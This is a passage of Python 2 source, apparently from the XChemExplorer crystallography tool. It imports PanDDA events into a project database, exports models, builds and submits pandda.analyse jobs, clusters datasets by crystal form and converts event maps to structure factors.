with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
for i,line in enumerate(csv_dict):
db_dict={}
sampleID=line['dtag']
if sampleID not in samples_to_export:
self.Logfile.warning('%s: not to be exported; will not add to panddaTable...' %sampleID)
continue
if sampleID not in pandda_hit_list:
pandda_hit_list.append(sampleID)
site_index=str(line['site_idx']).replace('.0','')
event_index=str(line['event_idx']).replace('.0','')
self.Logfile.insert(str(line))
self.Logfile.insert('reading {0!s} -> site {1!s} -> event {2!s}'.format(sampleID, site_index, event_index))
for entry in site_list:
if entry[0]==site_index:
site_name=entry[1]
site_comment=entry[2]
break
# check if EVENT map exists in project directory
event_map=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*ccp4')):
filename=file[file.rfind('/')+1:]
if filename.startswith(sampleID+'-event_'+event_index) and filename.endswith('map.native.ccp4'):
event_map=file
self.Logfile.insert('found respective event maps in {0!s}: {1!s}'.format(self.initial_model_directory, event_map))
break
# initial pandda model and mtz file
pandda_model=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*pdb')):
filename=file[file.rfind('/')+1:]
if filename.endswith('-ensemble-model.pdb'):
pandda_model=file
if sampleID not in self.already_exported_models:
self.already_exported_models.append(sampleID)
break
inital_mtz=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*mtz')):
filename=file[file.rfind('/')+1:]
if filename.endswith('pandda-input.mtz'):
inital_mtz=file
break
db_dict['CrystalName'] = sampleID
db_dict['PANDDApath'] = self.panddas_directory
db_dict['PANDDA_site_index'] = site_index
db_dict['PANDDA_site_name'] = site_name
db_dict['PANDDA_site_comment'] = site_comment
db_dict['PANDDA_site_event_index'] = event_index
db_dict['PANDDA_site_event_comment'] = line['Comment'].replace("'","")
db_dict['PANDDA_site_confidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_InspectConfidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_ligand_placed'] = line['Ligand Placed']
db_dict['PANDDA_site_viewed'] = line['Viewed']
db_dict['PANDDA_site_interesting'] = line['Interesting']
db_dict['PANDDA_site_z_peak'] = line['z_peak']
db_dict['PANDDA_site_x'] = line['x']
db_dict['PANDDA_site_y'] = line['y']
db_dict['PANDDA_site_z'] = line['z']
db_dict['PANDDA_site_ligand_id'] = ''
db_dict['PANDDA_site_event_map'] = event_map
db_dict['PANDDA_site_initial_model'] = pandda_model
db_dict['PANDDA_site_initial_mtz'] = inital_mtz
db_dict['PANDDA_site_spider_plot'] = ''
# find apo structures which were used
# XXX missing XXX
self.db.update_insert_site_event_panddaTable(sampleID,db_dict)
# this is necessary, otherwise RefinementOutcome will be reset for samples that are actually already in refinement
self.db.execute_statement("update panddaTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and RefinementOutcome is null".format(sampleID))
self.db.execute_statement("update mainTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and (RefinementOutcome is null or RefinementOutcome is '1 - Analysis Pending')".format(sampleID))
self.db.execute_statement("update mainTable set DimplePANDDAhit = 'True' where CrystalName is '{0!s}'".format(sampleID))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
        self.Logfile.insert('done reading pandda_inspect_events.csv')
# finally find all samples which do not have a pandda hit
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
self.Logfile.insert('check which datasets are not interesting')
# DimplePANDDAhit
# for xtal in glob.glob('*'):
# if xtal not in pandda_hit_list:
# self.Logfile.insert(xtal+': not in interesting_datasets; updating database...')
# self.db.execute_statement("update mainTable set DimplePANDDAhit = 'False' where CrystalName is '{0!s}'".format(xtal))
def export_models(self):
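        # which models are exported depends on self.which_models:
        #   'all'      -> every *-pandda-model.pdb found in the pandda directory
        #   'selected' -> only the datasets ticked in the pandda_analyse table
        #   otherwise  -> only models whose file timestamp differs from the database entry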
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
            self.Logfile.insert('Note: you chose to export ALL available PanDDA models!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
elif self.which_models == 'selected':
for i in range(0, self.pandda_analyse_data_table.rowCount()):
if str(self.pandda_analyse_data_table.item(i, 0).text()) == sample:
if self.pandda_analyse_data_table.cellWidget(i, 1).isChecked():
self.Logfile.insert('Dataset selected by user -> exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
break
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
                        advice = ( 'The pandda model of '+sample+' was changed, but it was already refined! '
                                   'This is most likely because this was done with an older version of XCE. '
                                   'If you really want to export and refine this model, you need to open the database '
                                   'with DBbrowser (sqlitebrowser.org); then change the RefinementOutcome field '
                                   'of the respective sample to "2 - PANDDA model", save the database and repeat the export procedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
            select_dir_string_new_pandda=' '
for sample in samples_to_export:
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
select_dir_string+="select_dir={0!s} ".format(sample)
                select_dir_string_new_pandda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
if os.path.isdir(os.path.join(self.panddas_directory,'rejected_datasets')):
Cmds = (
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string)+
' export_ligands=False'
' generate_occupancy_groupings=True\n'
)
else:
Cmds = (
'source /dls/science/groups/i04-1/software/pandda-update/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
# 'source '+os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')+'\n'
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
                ' {0!s}'.format(select_dir_string_new_pandda)+
' generate_restraints=True\n'
)
self.Logfile.insert('running pandda.export with the following settings:\n'+Cmds)
os.system(Cmds)
return samples_to_export
class run_pandda_analyse(QtCore.QThread):
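    # assembles a pandda.analyse shell script (possibly running over several rounds for
    # large numbers of datasets) and submits it to the local machine, a remote host or the cluster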
def __init__(self,pandda_params,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.submit_mode=pandda_params['submit_mode']
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.nproc=pandda_params['nproc']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.sort_event=pandda_params['sort_event']
self.number_of_datasets=pandda_params['N_datasets']
self.max_new_datasets=pandda_params['max_new_datasets']
self.grid_spacing=pandda_params['grid_spacing']
self.reference_dir=pandda_params['reference_dir']
self.filter_pdb=os.path.join(self.reference_dir,pandda_params['filter_pdb'])
self.wilson_scaling = pandda_params['perform_diffraction_data_scaling']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
self.appendix=pandda_params['appendix']
self.write_mean_maps=pandda_params['write_mean_map']
self.calc_map_by = pandda_params['average_map']
self.select_ground_state_model=''
projectDir = self.data_directory.replace('/*', '')
self.make_ligand_links='$CCP4/bin/ccp4-python %s %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),
'helpers',
'make_ligand_links_after_pandda.py')
,projectDir,self.panddas_directory)
self.use_remote = pandda_params['use_remote']
self.remote_string = pandda_params['remote_string']
if self.appendix != '':
self.panddas_directory=os.path.join(self.reference_dir,'pandda_'+self.appendix)
if os.path.isdir(self.panddas_directory):
os.system('/bin/rm -fr %s' %self.panddas_directory)
os.mkdir(self.panddas_directory)
if self.data_directory.startswith('/dls'):
self.select_ground_state_model = 'module load ccp4\n'
self.select_ground_state_model +='$CCP4/bin/ccp4-python %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),'helpers','select_ground_state_dataset.py'),self.panddas_directory)
self.make_ligand_links=''
def run(self):
# print self.reference_dir
# print self.filter_pdb
# how to run pandda.analyse on large datasets
#
# 1) Run the normal pandda command, with the new setting, e.g.
# pandda.analyse data_dirs=... max_new_datasets=500
# This will do the analysis on the first 500 datasets and build the statistical maps - just as normal.
#
# 2) Run pandda with the same command:
# pandda.analyse data_dirs=... max_new_datasets=500
# This will add 500 new datasets, and process them using the existing statistical maps
# (this will be quicker than the original analysis). It will then merge the results of the two analyses.
#
# 3) Repeat 2) until you don't add any "new" datasets. Then you can build the models as normal.
        number_of_cycles=int(self.number_of_datasets)/int(self.max_new_datasets)
        if int(self.number_of_datasets) % int(self.max_new_datasets) != 0:    # modulo gives remainder after integer division
            number_of_cycles+=1
        self.Logfile.insert('will run %s rounds of pandda.analyse' %str(number_of_cycles))
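        # e.g. 1700 datasets with max_new_datasets=500 -> 1700/500 = 3 (integer division)
        # plus one extra round for the remaining 200 datasets = 4 rounds in total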
if os.path.isfile(os.path.join(self.panddas_directory,'pandda.running')):
self.Logfile.insert('it looks as if a pandda.analyse job is currently running in: '+self.panddas_directory)
msg = ( 'there are three possibilities:\n'
'1.) choose another PANDDA directory\n'
'2.) - check if the job is really running either on the cluster (qstat) or on your local machine\n'
' - if so, be patient and wait until the job has finished\n'
'3.) same as 2., but instead of waiting, kill the job and remove at least the pandda.running file\n'
' (or all the contents in the directory if you want to start from scratch)\n' )
self.Logfile.insert(msg)
return None
else:
# if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
# source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh\n')
# elif os.getenv('SHELL') == '/bin/bash' or self.use_remote:
# source_file='export XChemExplorer_DIR="'+os.getenv('XChemExplorer_DIR')+'"\n'
# source_file+='source %s\n' %os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh\n')
# else:
# source_file=''
# v1.2.1 - pandda.setup files should be obsolete now that pandda is part of ccp4
# 08/10/2020 - pandda v0.2.12 installation at DLS is obsolete
# source_file='source /dls/science/groups/i04-1/software/pandda_0.2.12/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
source_file = ''
source_file += 'export XChemExplorer_DIR="' + os.getenv('XChemExplorer_DIR') + '"\n'
if os.path.isfile(self.filter_pdb + '.pdb'):
print('filter pdb located')
filter_pdb=' filter.pdb='+self.filter_pdb+'.pdb'
                print('will use ' + filter_pdb + ' as a filter for pandda.analyse')
else:
if self.use_remote:
stat_command = self.remote_string.replace("qsub'", str('stat ' + self.filter_pdb + "'"))
output = subprocess.Popen(stat_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = output.communicate()
print out
if 'cannot stat' in out:
filter_pdb = ''
else:
filter_pdb = ' filter.pdb=' + self.filter_pdb + '.pdb'
else:
filter_pdb=''
os.chdir(self.panddas_directory)
# note: copied latest pandda.setup-sh from XCE2 installation (08/08/2017)
dls = ''
if self.data_directory.startswith('/dls'):
dls = (
source_file +
'\n'
'module load pymol/1.8.2.0\n'
'\n'
'module load ccp4/7.0.072\n'
'\n'
)
Cmds = (
'#!'+os.getenv('SHELL')+'\n' +
'\n' +
dls +
'cd ' + self.panddas_directory + '\n' +
'\n'
)
ignore = []
char = []
zmap = []
for i in range(0, self.pandda_analyse_data_table.rowCount()):
ignore_all_checkbox = self.pandda_analyse_data_table.cellWidget(i, 7)
ignore_characterisation_checkbox = self.pandda_analyse_data_table.cellWidget(i, 8)
ignore_zmap_checkbox = self.pandda_analyse_data_table.cellWidget(i, 9)
if ignore_all_checkbox.isChecked():
ignore.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_characterisation_checkbox.isChecked():
char.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_zmap_checkbox.isChecked():
zmap.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
print ignore
def append_to_ignore_string(datasets_list, append_string):
if len(datasets_list)==0:
append_string = ''
for i in range(0, len(datasets_list)):
if i < len(datasets_list)-1:
append_string += str(datasets_list[i] + ',')
else:
append_string += str(datasets_list[i] +'"')
print(append_string)
return append_string
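            # e.g. append_to_ignore_string(['x0001','x0002'], 'ignore_datasets="')
            # returns 'ignore_datasets="x0001,x0002"'; an empty dataset list returns ''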
ignore_string = 'ignore_datasets="'
ignore_string = append_to_ignore_string(ignore, ignore_string)
char_string = 'exclude_from_characterisation="'
char_string = append_to_ignore_string(char, char_string)
zmap_string = 'exclude_from_z_map_analysis="'
zmap_string = append_to_ignore_string(zmap, zmap_string)
            for i in range(number_of_cycles):
Cmds += (
'pandda.analyse '+
' data_dirs="'+self.data_directory.replace('/*','')+'/*"'+
' out_dir="'+self.panddas_directory+'"'
' min_build_datasets='+self.min_build_datasets+
' max_new_datasets='+self.max_new_datasets+
' grid_spacing='+self.grid_spacing+
' cpus='+self.nproc+
' events.order_by='+self.sort_event+
filter_pdb+
' pdb_style='+self.pdb_style+
' mtz_style='+self.mtz_style+
' lig_style=/compound/*.cif'+
' apply_b_factor_scaling='+self.wilson_scaling+
' write_average_map='+self.write_mean_maps +
' average_map=' + self.calc_map_by +
' ' +
ignore_string +' '+
char_string +' '+
zmap_string +' '+
'\n'
)
Cmds += self.select_ground_state_model
Cmds += self.make_ligand_links
Cmds += '\n'
data_dir_string = self.data_directory.replace('/*', '')
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.cif" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
Cmds += '\n'
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.pdb" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
self.Logfile.insert('running pandda.analyse with the following command:\n'+Cmds)
f = open('pandda.sh','w')
f.write(Cmds)
f.close()
# #>>> for testing
# self.submit_mode='local machine'
self.Logfile.insert('trying to run pandda.analyse on ' + str(self.submit_mode))
if self.submit_mode=='local machine':
self.Logfile.insert('running PANDDA on local machine')
os.system('chmod +x pandda.sh')
os.system('./pandda.sh &')
elif self.use_remote:
# handles remote submission of pandda.analyse jobs
submission_string = self.remote_string.replace("qsub'",
str('cd ' +
self.panddas_directory +
'; ' +
"qsub -P labxchem -q medium.q -N pandda 5 -l exclusive,m_mem_free=100G pandda.sh'"))
os.system(submission_string)
self.Logfile.insert(str('running PANDDA remotely, using: ' + submission_string))
else:
self.Logfile.insert('running PANDDA on cluster, using qsub...')
os.system('qsub -P labxchem -q medium.q -N pandda -l exclusive,m_mem_free=100G pandda.sh')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
class giant_cluster_datasets(QtCore.QThread):
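    # clusters all datasets by crystal form with giant.datasets.cluster and writes the
    # resulting crystal form name of every dataset back into the datasource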
def __init__(self,initial_model_directory,pandda_params,xce_logfile,datasource,):
QtCore.QThread.__init__(self)
self.panddas_directory=pandda_params['out_dir']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(datasource)
def run(self):
self.emit(QtCore.SIGNAL('update_progress_bar'), 0)
if self.pdb_style.replace(' ','') == '':
self.Logfile.insert('PDB style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'PDB style is not set in pandda.analyse!')
return None
if self.mtz_style.replace(' ','') == '':
self.Logfile.insert('MTZ style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'MTZ style is not set in pandda.analyse!')
return None
# 1.) prepare output directory
os.chdir(self.panddas_directory)
if os.path.isdir('cluster_analysis'):
self.Logfile.insert('removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.system('/bin/rm -fr cluster_analysis 2> /dev/null')
self.Logfile.insert('creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.mkdir('cluster_analysis')
self.emit(QtCore.SIGNAL('update_progress_bar'), 10)
# 2.) go through project directory and make sure that all pdb files really exist
# broken links derail the giant.cluster_mtzs_and_pdbs script
self.Logfile.insert('cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
os.chdir(self.initial_model_directory)
for xtal in glob.glob('*'):
if not os.path.isfile(os.path.join(xtal,self.pdb_style)):
self.Logfile.insert('missing {0!s} and {1!s} for {2!s}'.format(self.pdb_style, self.mtz_style, xtal))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.pdb_style))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.mtz_style))
self.emit(QtCore.SIGNAL('update_progress_bar'), 20)
# 3.) giant.cluster_mtzs_and_pdbs
self.Logfile.insert("running giant.cluster_mtzs_and_pdbs {0!s}/*/{1!s} pdb_regex='{2!s}/(.*)/{3!s}' out_dir='{4!s}/cluster_analysis'".format(self.initial_model_directory, self.pdb_style, self.initial_model_directory, self.pdb_style, self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'running giant.cluster_mtzs_and_pdbs')
if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh')
elif os.getenv('SHELL') == '/bin/bash':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')
else:
source_file=''
Cmds = (
'#!'+os.getenv('SHELL')+'\n'
'unset PYTHONPATH\n'
'source '+source_file+'\n'
"giant.datasets.cluster %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory)
)
# os.system("giant.cluster_mtzs_and_pdbs %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory))
os.system(Cmds)
self.emit(QtCore.SIGNAL('update_progress_bar'), 80)
# 4.) analyse output
self.Logfile.insert('parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
os.chdir('{0!s}/cluster_analysis'.format(self.panddas_directory))
cluster_dict={}
for out_dir in sorted(glob.glob('*')):
if os.path.isdir(out_dir):
cluster_dict[out_dir]=[]
for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
xtal=folder[folder.rfind('/')+1:]
cluster_dict[out_dir].append(xtal)
self.emit(QtCore.SIGNAL('update_progress_bar'), 90)
# 5.) update datasource
self.Logfile.insert('updating datasource with results from giant.cluster_mtzs_and_pdbs')
if cluster_dict != {}:
for key in cluster_dict:
for xtal in cluster_dict[key]:
db_dict= {'CrystalFormName': key}
self.db.update_data_source(xtal,db_dict)
# 6.) finish
self.emit(QtCore.SIGNAL('update_progress_bar'), 100)
self.Logfile.insert('finished giant.cluster_mtzs_and_pdbs')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
class check_if_pandda_can_run:
# reasons why pandda cannot be run
# - there is currently a job running in the pandda directory
# - min datasets available is too low
    # - required input parameters are not complete
# - map amplitude and phase labels don't exist
def __init__(self,pandda_params,xce_logfile,datasource):
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.input_dir_structure=pandda_params['pandda_dir_structure']
self.problem_found=False
self.error_code=-1
self.Logfile=XChemLog.updateLog(xce_logfile)
self.db=XChemDB.data_source(datasource)
def number_of_available_datasets(self):
counter=0
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
counter+=1
self.Logfile.insert('pandda.analyse: found {0!s} useable datasets'.format(counter))
return counter
def get_first_dataset_in_project_directory(self):
first_dataset=''
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
first_dataset=file
break
return first_dataset
def compare_number_of_atoms_in_reference_vs_all_datasets(self,refData,dataset_list):
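        # compare the atom count of every dataset PDB file with the reference PDB;
        # datasets whose atom count differs are returned as mismatched_datasets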
mismatched_datasets=[]
pdbtools=XChemUtils.pdbtools(refData)
refPDB=refData[refData.rfind('/')+1:]
refPDBlist=pdbtools.get_init_pdb_as_list()
n_atom_ref=len(refPDBlist)
for n_datasets,dataset in enumerate(dataset_list):
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
n_atom=len(pdbtools.get_pdb_as_list(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)))
if n_atom_ref == n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> OK'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
if n_atom_ref != n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> ERROR'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
mismatched_datasets.append(dataset)
return n_datasets,mismatched_datasets
def get_datasets_which_fit_to_reference_file(self,ref,reference_directory,cluster_dict,allowed_unitcell_difference_percent):
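        # a dataset is assigned to this reference if both have the same space group number
        # and their unit-cell volumes differ by less than allowed_unitcell_difference_percent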
refStructure=XChemUtils.pdbtools(os.path.join(reference_directory,ref+'.pdb'))
symmRef=refStructure.get_spg_number_from_pdb()
ucVolRef=refStructure.calc_unitcell_volume_from_pdb()
cluster_dict[ref]=[]
cluster_dict[ref].append(os.path.join(reference_directory,ref+'.pdb'))
for dataset in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
datasetStructure=XChemUtils.pdbtools(dataset)
symmDataset=datasetStructure.get_spg_number_from_pdb()
ucVolDataset=datasetStructure.calc_unitcell_volume_from_pdb()
if symmDataset == symmRef:
try:
difference=math.fabs(1-(float(ucVolRef)/float(ucVolDataset)))*100
if difference < allowed_unitcell_difference_percent:
sampleID=dataset.replace('/'+self.pdb_style,'')[dataset.replace('/'+self.pdb_style,'').rfind('/')+1:]
cluster_dict[ref].append(sampleID)
except ZeroDivisionError:
continue
return cluster_dict
def remove_dimple_files(self,dataset_list):
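        # remove existing dimple output (pdb/mtz) for the given datasets and reset the
        # corresponding DIMPLE columns in the database to 'pending'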
for n_datasets,dataset in enumerate(dataset_list):
db_dict={}
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.pdb_style))
db_dict['DimplePathToPDB']=''
db_dict['DimpleRcryst']=''
db_dict['DimpleRfree']=''
db_dict['DimpleResolutionHigh']=''
db_dict['DimpleStatus']='pending'
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.mtz_style))
db_dict['DimplePathToMTZ']=''
if db_dict != {}:
self.db.update_data_source(dataset,db_dict)
def analyse_pdb_style(self):
pdb_found=False
for file in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
if os.path.isfile(file):
pdb_found=True
break
if not pdb_found:
self.error_code=1
message=self.warning_messages()
return message
def analyse_mtz_style(self):
mtz_found=False
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
mtz_found=True
break
if not mtz_found:
self.error_code=2
message=self.warning_messages()
return message
def analyse_min_build_dataset(self):
counter=0
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
counter+=1
if counter <= self.min_build_datasets:
self.error_code=3
message=self.warning_messages()
return message
def warning_messages(self):
message=''
if self.error_code==1:
message='PDB file does not exist'
if self.error_code==2:
message='MTZ file does not exist'
if self.error_code==3:
message='Not enough datasets available'
return message
class convert_all_event_maps_in_database(QtCore.QThread):
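    # converts every event map referenced in the panddaTable into structure factors;
    # the ligand extracted from refine.pdb defines the region of interest and
    # refine.mtz provides the resolution limit for the conversion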
def __init__(self,initial_model_directory,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
def run(self):
sqlite = (
'select'
' CrystalName,'
' PANDDA_site_event_map,'
' PANDDA_site_ligand_resname,'
' PANDDA_site_ligand_chain,'
' PANDDA_site_ligand_sequence_number,'
' PANDDA_site_ligand_altLoc '
'from panddaTable '
'where PANDDA_site_event_map not like "event%"'
)
print sqlite
query=self.db.execute_statement(sqlite)
print query
progress_step=1
if len(query) != 0:
progress_step=100/float(len(query))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for item in query:
print item
xtalID=str(item[0])
event_map=str(item[1])
resname=str(item[2])
chainID=str(item[3])
resseq=str(item[4])
altLoc=str(item[5])
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')):
os.chdir(os.path.join(self.initial_model_directory,xtalID))
self.Logfile.insert('extracting ligand ({0!s},{1!s},{2!s},{3!s}) from refine.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc)))
XChemUtils.pdbtools(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')).save_specific_ligands_to_pdb(resname,chainID,resseq,altLoc)
if os.path.isfile('ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))):
ligand_pdb='ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))
print os.path.join(self.initial_model_directory,xtalID,ligand_pdb)
else:
self.Logfile.insert('could not extract ligand; trying next...')
continue
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.pdb; trying next')
continue
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')):
resolution=XChemUtils.mtztools(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')).get_high_resolution_from_mtz()
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.mtz; trying next')
continue
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'eventMap -> SF for '+event_map)
convert_event_map_to_SF(self.initial_model_directory,xtalID,event_map,ligand_pdb,self.xce_logfile,self.datasource,resolution).run()
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
class convert_event_map_to_SF:
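    # converts a single event map into an MTZ file with structure factors:
    # the map is expanded to P1, converted with phenix.map_to_structure_factors
    # and the column labels of the output MTZ are renamed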
